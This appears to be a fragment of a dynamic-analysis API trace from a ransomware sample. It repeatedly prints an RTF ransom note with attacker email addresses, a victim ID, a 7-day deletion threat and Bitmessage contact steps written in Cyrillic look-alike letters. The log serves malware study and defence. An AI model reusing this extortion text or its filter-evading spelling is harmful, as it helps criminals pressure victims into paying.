middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.161] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.161] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd 